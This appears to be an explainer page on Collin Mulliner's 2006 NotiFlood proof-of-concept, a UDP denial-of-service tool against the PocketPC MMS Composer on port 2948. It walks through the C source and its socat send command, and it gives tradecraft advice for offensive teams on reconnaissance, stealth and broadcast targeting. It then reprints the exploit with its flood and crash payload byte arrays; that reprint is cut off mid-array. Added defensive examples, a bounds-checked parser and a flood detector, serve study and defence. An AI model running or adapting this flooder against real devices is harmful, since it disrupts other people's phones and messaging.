PocketPC MMS Composer WAPPush Denial of Service Exploit Explained

What this paper is
This paper, published in 2006 by Collin Mulliner, presents a proof-of-concept tool called "NotiFlood." Its purpose is to demonstrate a denial-of-service (DoS) vulnerability in the MMS (Multimedia Messaging Service) Composer on PocketPC devices. The exploit targets the WAPPush port (UDP:2948) and can either flood the device with notifications, causing it to freeze or reject messages, or repeatedly crash the MMS client, making it unusable.
Simple technical breakdown
The vulnerability lies in how the PocketPC MMS Composer handles incoming MMS "new message notifications." These notifications are sent over UDP to port 2948. The tool crafts specially malformed or excessively repetitive notifications.
- Flood Mode: Sends a large number of valid-looking notifications. This triggers the device to play a sound for each, and if auto-receive is enabled, it might attempt to connect to the network (e.g., GPRS). After receiving many notifications, the device becomes unstable, freezes, or stops accepting new messages. The MMS inbox also gets filled with these messages, which can only be deleted manually, one by one.
- Crash Mode: Sends notifications that are designed to cause the MMS client application to crash. This prevents the user from accessing the MMS inbox and potentially other related services like email (POP3/IMAP) while the device is connected to Wi-Fi.
The tool uses two different byte arrays (mms1 and mms2) representing these notifications, with mms2 being specifically crafted for the crash mode.
Complete code and payload walkthrough
The provided C code implements the NotiFlood tool. Let's break down its components:
1. Data Structures and Global Variables:
- mms1_pos[]: An array of integers holding byte offsets into the mms1 payload. These are the positions where dynamic data (the timestamp-based identifier, the sender, recipient and subject strings, and the URL) is inserted.
- mms1[]: An array of unsigned characters holding the "flood" mode payload, a byte sequence laid out like an MMS notification.
- mms2[]: An array of unsigned characters holding the "crash" mode payload. It is similar to mms1 but contains variations intended to trigger a crash.
- to[], from[], subject[]: Global character arrays holding the recipient, sender and subject strings for the notification. Each can be overridden by a command-line argument.
- iteration: An unsigned integer counter used to give each sent packet a unique value.
2. iterate(unsigned char *nty, int *pos) function:
- Purpose: Dynamically modifies parts of the notification payload (nty) at the positions given in pos.
- Inputs:
- nty: A pointer to the notification payload (either mms1 or mms2).
- pos: A pointer to the array of integer offsets for that payload.
- Behavior:
- It declares two temporary character buffers, tmp and tmp2 (57 bytes each).
- sprintf(tmp, "%u%u", time(NULL), iteration);: Builds a string by concatenating the current Unix timestamp (time(NULL)) and the iteration counter, giving each notification a unique identifier.
- memset(&nty[pos[0]], '0', 57);: Fills 57 bytes of the payload at offset pos[0] with '0' characters.
- memcpy(&nty[pos[0]], tmp, (strlen(tmp) < 57) ? strlen(tmp) : 56);: Copies the generated tmp string into the payload at pos[0]: the whole string if it is shorter than 57 bytes, otherwise at most 56 bytes, so the write cannot run past the cleared region.
- sprintf(tmp2, "http://127.0.0.1/?%s", tmp);: Builds a URL that carries the tmp identifier as its query string. This URL is likely part of the data that triggers the vulnerability.
- memset(&nty[pos[4]], '0', 57);: Fills 57 bytes at offset pos[4] with '0' characters.
- memcpy(&nty[pos[4]], tmp2, (strlen(tmp2) < 57) ? strlen(tmp2) : 56);: Copies the tmp2 URL into the payload at pos[4], again capped at 56 bytes.
- Output: Modifies the nty payload in place.
- Mapping:
- nty: The MMS notification payload being modified.
- pos[0]: Offset of the timestamp-based identifier.
- pos[4]: Offset of the crafted URL.
3. init(unsigned char *nty, int *pos) function:
- Purpose: Initializes the sender, recipient and subject fields of the notification payload.
- Inputs:
- nty: A pointer to the notification payload.
- pos: A pointer to the array of integer offsets for that payload.
- Behavior:
- memset(&nty[pos[1]], ' ', 56);: Fills 56 bytes at offset pos[1] with spaces.
- memcpy(&nty[pos[1]], from, (strlen(from) < 57) ? strlen(from) : 56);: Copies the from address into the payload at pos[1], capped at 56 bytes.
- memset(&nty[pos[2]], ' ', 56);: Fills 56 bytes at offset pos[2] with spaces.
- memcpy(&nty[pos[2]], to, (strlen(to) < 57) ? strlen(to) : 56);: Copies the to address into the payload at pos[2], capped at 56 bytes.
- memset(&nty[pos[3]], ' ', 56);: Fills 56 bytes at offset pos[3] with spaces.
- memcpy(&nty[pos[3]], subject, (strlen(subject) < 57) ? strlen(subject) : 56);: Copies the subject into the payload at pos[3], capped at 56 bytes.
- Output: Modifies the nty payload in place.
- Mapping:
- pos[1]: Offset of the sender (from) field.
- pos[2]: Offset of the recipient (to) field.
- pos[3]: Offset of the subject field.
4. usage() function:
- Purpose: Prints the help message and usage instructions for the notiflood tool.
- Behavior: Displays the available command-line options with a one-line description of each.
5. main(int argc, char **argv) function:
- Purpose: The entry point of the program. It parses command-line arguments, prepares the payload, and sends it to the target.
- Behavior:
- Argument Parsing: Uses getopt to parse the command-line options: destination IP (-d), interval (-i), number of packets (-n), subject (-s), from (-f), to (-t), crash mode (-c), flip-flop mode (-F), quiet mode (-q), and help (-h). If a non-option argument is left over, or no destination was given, it prints the usage text and exits.
- Initialization:
- Sets default values for dest, interval, num, verbose, and mode.
- Builds the socat command line into system_cmd once, before the loop, using the destination IP.
- Calls init() for both the mms1 and mms2 payloads to populate the sender, recipient, and subject fields.
- Verbose Output: If verbose is set, prints the configured settings.
- Mode Handling: Sets the flipflop flag if -F was given.
- Main Loop (do-while):
- iteration++: Increments the global counter.
- f = open("mmsflood.fld", O_CREAT|O_RDWR|O_TRUNC, 00666);: Creates or truncates a file named "mmsflood.fld" to hold the payload.
- Payload Selection:
- If mode == 0 (flood): Calls iterate(mms1, mms1_pos) to modify mms1 and then writes mms1 to "mmsflood.fld".
- If mode == 1 (crash): Calls iterate(mms2, mms2_pos) to modify mms2 and then writes mms2 to "mmsflood.fld".
- close(f);: Closes the file.
- sprintf(system_cmd, "cat mmsflood.fld|socat udp4:%s:2948,broadcast stdin &", dest); (executed before the loop): Constructs the shell command that uses socat to read "mmsflood.fld" and send its contents as a UDP packet to the destination IP (dest) on port 2948. The trailing & runs the command in the background.
- system(system_cmd);: Executes the constructed shell command.
- Flip-flop Logic: If flipflop is enabled, toggles mode between 0 and 1 for the next iteration. (Because mode starts at 2 in flip-flop mode, the first iteration writes an empty file; the toggle then sets mode to 0.)
- if (interval > 0) usleep(interval);: Pauses for interval microseconds if interval is greater than 0.
- Loop Condition: Continues while iteration is less than num (if num is not 0), or forever if num is 0 (unlimited packets).
- Return: Exits with status 0.
Payload Bytes (mms1 and mms2):
These byte arrays are the raw data sent as UDP packets. They appear to be structured the way the PocketPC MMS Composer expects an MMS notification to look, and the specific values and their arrangement are what trigger the vulnerability.
- The initial bytes (0x00, 0x06, 0x22, then 0x61, 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x2f, 0x76, 0x6e, 0x64, 0x2e, 0x77, 0x61, 0x70, 0x2e, 0x6d, 0x6d, 0x73, 0x2d, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x00) carry the MIME type of the message: the run from 0x61 to 0x65 is the ASCII string application/vnd.wap.mms-message, terminated by 0x00.
- The subsequent bytes are filled with various data, including what appear to be placeholders for the sender, recipient, subject, and other message details.
- The mms1_pos and mms2_pos arrays point to the locations within these byte arrays where dynamic data (timestamps, URLs, or potentially malformed data) is inserted by the iterate and init functions.
- The mms2 payload contains long runs of 0x41 (ASCII 'A') in places where mms1 holds different data, which suggests that mms2 is crafted with oversized or unexpected field contents to induce a crash.
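To make the structure of those leading bytes concrete, here is an added example, written for this page and not part of NotiFlood or Mulliner's paper, that parses the WSP Push PDU prefix the way a hardened receiver should: every length field is checked against the datagram size before it is used, and the constructed sample input is the first 40 bytes of the page's mms1 array. The struct name wsp_push, the function names and the MAX_CONTENT_TYPE limit are this example's own choices.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not part of NotiFlood: a bounds-checked reader for the WSP Push PDU
 * that mms1 and mms2 begin with. Layout (WAP-230 WSP Push PDU): TID (1 byte), PDU type
 * (1 byte, 0x06 = Push), HeadersLen (uintvar), HeadersLen bytes of content type plus
 * headers, then the body (here the MMS notification). */
#define WSP_PDU_PUSH     0x06
#define MAX_CONTENT_TYPE 64          /* policy limit chosen for this example */

struct wsp_push {
    uint8_t tid, pdu_type;
    size_t  headers_len;
    char    content_type[MAX_CONTENT_TYPE];
    size_t  body_off, body_len;      /* where the body starts and how long it is */
};

/* Decode a WSP uintvar (7 data bits per byte, high bit = "more follows").
 * Returns bytes consumed, or 0 if the field is truncated or longer than 5 bytes. */
static size_t read_uintvar(const uint8_t *p, size_t len, size_t *out)
{
    size_t v = 0;
    for (size_t i = 0; i < len && i < 5; i++) {
        v = (v << 7) | (p[i] & 0x7f);
        if (!(p[i] & 0x80)) { *out = v; return i + 1; }
    }
    return 0;
}

/* Returns 0 on success; each negative code names why the PDU was refused.
 * No length taken from the packet is used before it is compared with len. */
int parse_wsp_push(const uint8_t *pdu, size_t len, struct wsp_push *out)
{
    if (len < 3) return -1;                                /* no room for TID, type, HeadersLen */
    out->tid = pdu[0];
    out->pdu_type = pdu[1];
    if (out->pdu_type != WSP_PDU_PUSH) return -2;
    size_t n = read_uintvar(pdu + 2, len - 2, &out->headers_len);
    if (n == 0) return -3;                                 /* bad or truncated HeadersLen */
    size_t hdr_start = 2 + n;
    if (out->headers_len > len - hdr_start) return -4;     /* HeadersLen overruns the datagram */
    const uint8_t *ct = pdu + hdr_start;
    if (out->headers_len == 0 || ct[0] >= 0x80) return -5; /* only the text-string form is handled */
    const uint8_t *nul = memchr(ct, 0, out->headers_len);
    if (nul == NULL) return -6;                            /* content type not terminated in headers */
    size_t ct_len = (size_t)(nul - ct);
    if (ct_len >= MAX_CONTENT_TYPE) return -7;
    memcpy(out->content_type, ct, ct_len);
    out->content_type[ct_len] = '\0';
    out->body_off = hdr_start + out->headers_len;
    out->body_len = len - out->body_off;
    return 0;
}

/* True if the body opens with X-Mms-Message-Type (0x8C) = m-notification-ind (0x82),
 * the MMS header pair both payloads on the page carry right after the WSP part. */
int is_mms_notification(const uint8_t *pdu, const struct wsp_push *p)
{
    return p->body_len >= 2 && pdu[p->body_off] == 0x8c && pdu[p->body_off + 1] == 0x82;
}

/* Constructed sample: the first 40 bytes of the page's mms1 array. */
static const uint8_t sample_pdu[] = {
    0x00, 0x06, 0x22,                 /* TID 0, type Push, HeadersLen 34 */
    'a','p','p','l','i','c','a','t','i','o','n','/','v','n','d','.',
    'w','a','p','.','m','m','s','-','m','e','s','s','a','g','e', 0x00,
    0xaf, 0x84,                       /* X-Wap-Application-Id = mms.ua */
    0x8c, 0x82, 0x98                  /* body: Message-Type = m-notification-ind, Transaction-Id */
};
int demo_parse_sample(void)               /* 0: accepted */
{
    struct wsp_push p;
    return parse_wsp_push(sample_pdu, sizeof sample_pdu, &p);
}
int demo_sample_is_notification(void)     /* 1 */
{
    struct wsp_push p;
    return parse_wsp_push(sample_pdu, sizeof sample_pdu, &p) == 0 && is_mms_notification(sample_pdu, &p);
}
int demo_parse_truncated(void)            /* -4: HeadersLen says 34 but only 17 bytes follow */
{
    struct wsp_push p;
    return parse_wsp_push(sample_pdu, 20, &p);
}
int demo_parse_unterminated(void)         /* -6: content type has no NUL inside the headers */
{
    static const uint8_t bad[] = { 0x00, 0x06, 0x03, 'a', 'b', 'c', 0x8c, 0x82 };
    struct wsp_push p;
    return parse_wsp_push(bad, sizeof bad, &p);
}
int main(void)
{
    printf("sample=%d notification=%d truncated=%d unterminated=%d\n", demo_parse_sample(),
           demo_sample_is_notification(), demo_parse_truncated(), demo_parse_unterminated());
    return 0;
}
```

The point of the negative cases is the one the page's defensive section makes in the abstract: a receiver that trusts HeadersLen, or that scans for the content type's terminator without a bound, is exactly the kind of handler that a few hundred crafted datagrams can push into a crash. The text-string content type is the only form handled here; a well-known single-byte or value-length content type is refused with -5 rather than guessed at.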
socat command:
- cat mmsflood.fld: Reads the content of the generated payload file.
- |: Pipes the output of cat to socat.
- socat udp4:<dest>:2948,broadcast stdin: socat is a versatile network utility. Here it is configured as follows:
- udp4: Use UDP over IPv4.
- <dest>:2948: Send to the specified destination IP (dest) on port 2948.
- broadcast: Sets the socket option that permits sending to a broadcast address (e.g., 192.168.1.255).
- stdin: Read the data to send from standard input (which is piped from cat).
- &: Runs the socat command in the background.
Mapping list:
- mms1_pos, mms2_pos: Define the offsets within the payloads where dynamic data is inserted.
- mms1[]: Payload for flooding the MMS client.
- mms2[]: Payload designed to crash the MMS client.
- to, from, subject: User-configurable fields for the MMS notification.
- iteration: Counter that makes each sent payload unique.
- iterate(): Injects dynamic, unique data into the payload.
- init(): Injects the static sender, recipient, and subject data.
- main(): Orchestrates argument parsing, payload generation, and sending.
- system_cmd construction with socat: The mechanism for sending the crafted UDP packets.
Practical details for offensive operations teams
- Required Access Level: Network access to the target subnet or direct Wi-Fi connectivity to the target device is required. No elevated privileges on the target device are needed, as this is a network-based attack.
- Lab Preconditions:
- A controlled network environment simulating the target's network.
- A PocketPC device (or emulator) running a vulnerable version of Windows Mobile/CE (specifically tested on WinCE 4.2x with MMS Composer 1.5 and 2.0).
- The target device must be connected to the network (Wi-Fi is ideal for this exploit).
- The socat utility must be installed on the attacker's machine.
- The notiflood executable must be compiled on a Linux system (it uses Linux networking headers and getopt).
- Tooling Assumptions:
- The attacker machine runs a Linux-based OS.
- socat is available.
- A C compiler (such as GCC) is available for compiling notiflood.
- Execution Pitfalls:
- Network Segmentation: If the target device is on a different network segment and there are no routing or broadcast mechanisms allowing the crafted UDP packets to reach it, the attack will fail.
- Firewalls: Network firewalls blocking UDP traffic on port 2948 will prevent the exploit from reaching the target.
- MMS Composer Version: The exploit is specific to older versions of PocketPC MMS Composer. Newer versions might have patched this vulnerability.
- Auto-Receive Configuration: The "flood" mode's effectiveness in causing network connections depends on the device's auto-receive settings for MMS.
- Broadcast vs. Unicast: Using broadcast (-d 192.168.1.255) is effective for targeting multiple devices on the same subnet but generates noise. Targeting a specific IP (-d <target_ip>) is more precise.
- Payload Corruption: If the mmsflood.fld file is not created correctly or socat fails to send the data, the exploit will not work.
- Crash Mode Reliability: While designed to crash the client, the exact behavior of crash mode can vary slightly depending on the device model and OS configuration.
- Flip-flop Mode: The -F option toggles between flood and crash modes. This can be used to repeatedly disrupt the service, but it also means the attacker needs to monitor the target's state to know which mode is currently active.
- Tradecraft Considerations:
- Reconnaissance: Identifying the target device's IP address and confirming it's a PocketPC running an older OS is crucial. Checking for open UDP port 2948 would be beneficial.
- Stealth: Sending a large volume of UDP packets, especially broadcast packets, can be noisy and easily detected by network monitoring tools. Targeting specific IPs and using longer intervals can reduce noise.
- Payload Delivery: The exploit relies on sending raw UDP packets. The socat command is a simple way to achieve this, but more sophisticated packet-crafting tools could be used in advanced scenarios.
- Post-Exploitation: If the goal is to gain further access, crashing the MMS client might be a precursor to other attacks that exploit different services on the device. However, this paper focuses solely on DoS.
- Limited Scope: This exploit is specific to the MMS Composer and its WAPPush handling. It does not provide remote code execution or access to sensitive data.
Where this was used and when
This exploit was presented at DEFCON 14 in 2006. The paper and tool were released around the same time. It was designed to demonstrate vulnerabilities in PocketPC phones of that era, specifically targeting the MMS Composer. The vulnerability was likely present in devices running Windows Mobile/CE versions 4.2x with MMS Composer versions 1.5 and 2.0. Given the age of the exploit, it's highly unlikely to be effective against modern smartphones or even significantly updated versions of older mobile operating systems.
Defensive lessons for modern teams
- Protocol Validation: Implement robust validation of incoming network protocols and message formats. Unexpected or malformed data should be handled gracefully, not by crashing the application.
- Resource Limiting: Applications handling network services should have built-in limits on the number of messages or connections they can process within a given time frame to prevent flooding.
- Secure Defaults: Disable auto-receive features for potentially resource-intensive services like MMS by default.
- Regular Patching and Updates: Keep operating systems and applications, especially those exposed to network services, up-to-date with the latest security patches.
- Network Segmentation and Firewalls: Isolate critical devices and services using network segmentation. Employ firewalls to restrict access to necessary ports and protocols from untrusted sources.
- Intrusion Detection/Prevention Systems (IDS/IPS): Deploy IDS/IPS solutions that can detect and alert on unusual network traffic patterns, such as a high volume of UDP packets to specific ports.
- Application Sandboxing: Run applications in sandboxed environments to limit the impact of a compromise or crash on the rest of the system.
- Modern Messaging Protocols: Modern messaging systems (like those used in current smartphones) employ more secure and robust protocols, often with end-to-end encryption and better error handling, making them less susceptible to such simple DoS attacks.
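As an added example for the resource-limiting and IDS/IPS points above (not from the paper or the NotiFlood source), the following C program applies a per-source sliding-window count to constructed firewall-style log lines and reports any source that sends more than a threshold of UDP datagrams to port 2948 within the window. The log format, interface and address values, timestamps, and the threshold of five datagrams in five seconds are all made up for the example.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not from the paper or NotiFlood): a per-source sliding-window detector
 * for the traffic pattern the tool produces, run over constructed firewall-style log
 * lines. A source that sends more than a threshold of UDP datagrams to port 2948 within
 * the window is reported once. Log format, addresses and timestamps are made up. */
#define WAPPUSH_PORT 2948
#define MAX_SOURCES  32
#define MAX_EVENTS   256

struct source {
    char   ip[16];
    long   ts[MAX_EVENTS];   /* arrival times (epoch seconds), in log order */
    size_t n;
    int    flagged;
};
static struct source sources[MAX_SOURCES];
static size_t nsources;

/* Parse one line; returns 1 only for UDP datagrams addressed to the WAPPush port. */
static int parse_line(const char *line, long *ts, char ip[16])
{
    char proto[8];
    int dport;
    if (sscanf(line, "%ld IN=%*s SRC=%15s DST=%*s PROTO=%7s SPT=%*d DPT=%d",
               ts, ip, proto, &dport) != 4)
        return 0;
    return strcmp(proto, "UDP") == 0 && dport == WAPPUSH_PORT;
}

/* Find or create the per-source record; NULL when the table is full. */
static struct source *lookup(const char *ip)
{
    for (size_t i = 0; i < nsources; i++)
        if (strcmp(sources[i].ip, ip) == 0) return &sources[i];
    if (nsources == MAX_SOURCES) return NULL;
    struct source *s = &sources[nsources++];
    memset(s, 0, sizeof *s);
    strcpy(s->ip, ip);                   /* ip is at most 15 chars (see %15s above) */
    return s;
}

/* Feed the lines in order; returns how many sources crossed the threshold. */
int scan_log(const char *const *lines, size_t nlines, int threshold, long window_s)
{
    int flagged = 0;
    nsources = 0;
    for (size_t i = 0; i < nlines; i++) {
        long ts;
        char ip[16];
        if (!parse_line(lines[i], &ts, ip)) continue;
        struct source *s = lookup(ip);
        if (s == NULL || s->n == MAX_EVENTS) continue;
        s->ts[s->n++] = ts;
        int in_window = 0;               /* datagrams from this source in the trailing window */
        for (size_t j = 0; j < s->n; j++)
            if (ts - s->ts[j] <= window_s) in_window++;
        if (in_window > threshold && !s->flagged) {
            s->flagged = 1;
            flagged++;
            printf("ALERT %s: %d datagrams to udp/%d within %ld s\n",
                   s->ip, in_window, WAPPUSH_PORT, window_s);
        }
    }
    return flagged;
}

/* Accessors so the results can be inspected after a scan. */
const char *source_ip(size_t i) { return i < nsources ? sources[i].ip : ""; }
int source_flagged(size_t i)    { return i < nsources && sources[i].flagged; }

/* Constructed log: 192.168.1.77 sends eight notifications in four seconds (flood mode
 * at a sub-second interval); 192.168.1.5 sends two, minutes apart; a TCP line and a
 * DNS query are included to show that they are ignored. */
static const char *const sample_log[] = {
    "1155118800 IN=wlan0 SRC=192.168.1.5 DST=192.168.1.20 PROTO=UDP SPT=2948 DPT=2948",
    "1155118800 IN=wlan0 SRC=192.168.1.77 DST=192.168.1.20 PROTO=UDP SPT=40001 DPT=2948",
    "1155118800 IN=wlan0 SRC=192.168.1.77 DST=192.168.1.20 PROTO=UDP SPT=40002 DPT=2948",
    "1155118801 IN=wlan0 SRC=192.168.1.77 DST=192.168.1.20 PROTO=UDP SPT=40003 DPT=2948",
    "1155118801 IN=wlan0 SRC=192.168.1.77 DST=192.168.1.20 PROTO=TCP SPT=40004 DPT=80",
    "1155118801 IN=wlan0 SRC=192.168.1.77 DST=192.168.1.1 PROTO=UDP SPT=40005 DPT=53",
    "1155118801 IN=wlan0 SRC=192.168.1.77 DST=192.168.1.20 PROTO=UDP SPT=40006 DPT=2948",
    "1155118802 IN=wlan0 SRC=192.168.1.77 DST=192.168.1.20 PROTO=UDP SPT=40007 DPT=2948",
    "1155118802 IN=wlan0 SRC=192.168.1.77 DST=192.168.1.20 PROTO=UDP SPT=40008 DPT=2948",
    "1155118802 IN=wlan0 SRC=192.168.1.77 DST=192.168.1.20 PROTO=UDP SPT=40009 DPT=2948",
    "1155118803 IN=wlan0 SRC=192.168.1.77 DST=192.168.1.20 PROTO=UDP SPT=40010 DPT=2948",
    "1155118960 IN=wlan0 SRC=192.168.1.5 DST=192.168.1.20 PROTO=UDP SPT=2948 DPT=2948",
};

/* More than 5 datagrams within 5 s from one source counts as a flood here. */
int demo_scan(void) { return scan_log(sample_log, sizeof sample_log / sizeof *sample_log, 5, 5); }

int main(void)
{
    printf("%d flooding source(s)\n", demo_scan());
    return 0;
}
```

The same count-per-source-per-window logic belongs inside the receiving application as well as in the monitoring path: a notification handler that refuses, or silently drops, the sixth notification from one sender in a few seconds cannot have its inbox filled or its sound played hundreds of times, which is the flood-mode outcome the paper describes. On a real firewall log the timestamp field would need a date parser rather than a raw epoch value, and the window should be tuned against the rate a legitimate MMSC actually delivers at.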
ASCII visual (if applicable)
This exploit is primarily a network-based attack targeting a specific service on a device. A simple visual representation of the attack flow:
+------------------+        +----------------------+        +---------------------+
| Attacker Machine | -----> | Network (UDP:2948)   | -----> |   Target PocketPC   |
| (NotiFlood Tool) |        | (e.g., Wi-Fi)        |        |   (MMS Composer)    |
+------------------+        +----------------------+        +----------+----------+
                                                                       |
                                                                       | (Vulnerable Handling)
                                                                       v
                                                            +---------------------+
                                                            |  Denial of Service  |
                                                            |   (Crash/Freeze)    |
                                                            +---------------------+
Explanation:
- The attacker's machine runs the NotiFlood tool.
- The tool crafts UDP packets and sends them over the network (e.g., Wi-Fi).
- These packets are directed to the target PocketPC's UDP port 2948.
- The vulnerable MMS Composer on the PocketPC receives these packets.
- Due to improper handling, the device experiences a denial of service, either by crashing or freezing.
Source references
- PAPER ID: 2156
- PAPER TITLE: PocketPC Mms Composer - 'WAPPush' Denial of Service
- AUTHOR: Collin Mulliner
- PUBLISHED: 2006-08-09
- KEYWORDS: Hardware,dos
- PAPER URL: https://www.exploit-db.com/papers/2156
- RAW URL: https://www.exploit-db.com/raw/2156
Original Exploit-DB Content (Verbatim)
/*
* This is a Proof-of-Concept tool to demonstrate the PocketPC MMS Composer
* flood/crash vulnerability (ab)using the WAPPush port UDP:2948
*
* This is for educational purposes only! Please use responsible!
*
* (c) Collin Mulliner <collin@trifinite.org>
* http://www.trifinite.org
* http://www.mulliner.org/pocketpc/
*
* NotfiFlood - a Proof-of-Concept PocketPC MMS Composer flooder
*
*(c) Collin Mulliner <collin@trifinite.org>
*
* http://www.mulliner.org/pocketpc/
* http://www.trifinite.org/
*
**** For educational purposes only! Please use responsible! ***
*
* NotiFlood is a PoC MMS M-notification.ind flooder written to demo the PocketPC
* MMS Composer vulnerabilities for my DEFCON-14 talk "Advanced Attacks Against
* PocketPC Phones".
*
* The tool sends MMS new message notifications to the target PocketPC device over
* WiFi IP:UDP4:2948. In flood mode the device plays the new message sound for
* every received notification. If auto receive is enabled the phone will try to
* dial-up GPRS in order to receive the message. After receiving a couple
* hundred messages the phone randomly freezes or rejects new messages. Further
* the MMS inbox is filled up with messages that only can be deleted manually
* one-by-one. In crash mode, each notification crashes the MMS client and
* therefore actively keeps the user from using the Inbox application while
* connected to WiFi (the Inbox application also handles email like via POP3 and
* IMAP).
*
* This was tested with WinCE 4.2x and MMS Composer 1.5 and 2.0
*
* Examples:
* flood all clients in 192.168.1/24:
* notiflood -d 192.168.1.255 -n 0
*
* crash client at: 192.168.42.29:
* notiflood -d 192.168.42.29 -i 500000 -n 1 -c
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
//#include <libnet.h>
#include <sys/poll.h>
#include <sys/ioctl.h>
#include <linux/if_tun.h>
#include <arpa/inet.h>
#include <getopt.h>
#include <netinet/ip.h>
#include <netinet/if_ether.h>
#include <net/ethernet.h>
#include <time.h>
#include <sys/un.h>
int mms1_pos[] = {40, 106, 167, 228, 289};
unsigned char mms1[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x97,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x96,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8e,0x66,0x68,0x32,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0xd0,0x00};
unsigned char mms2[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,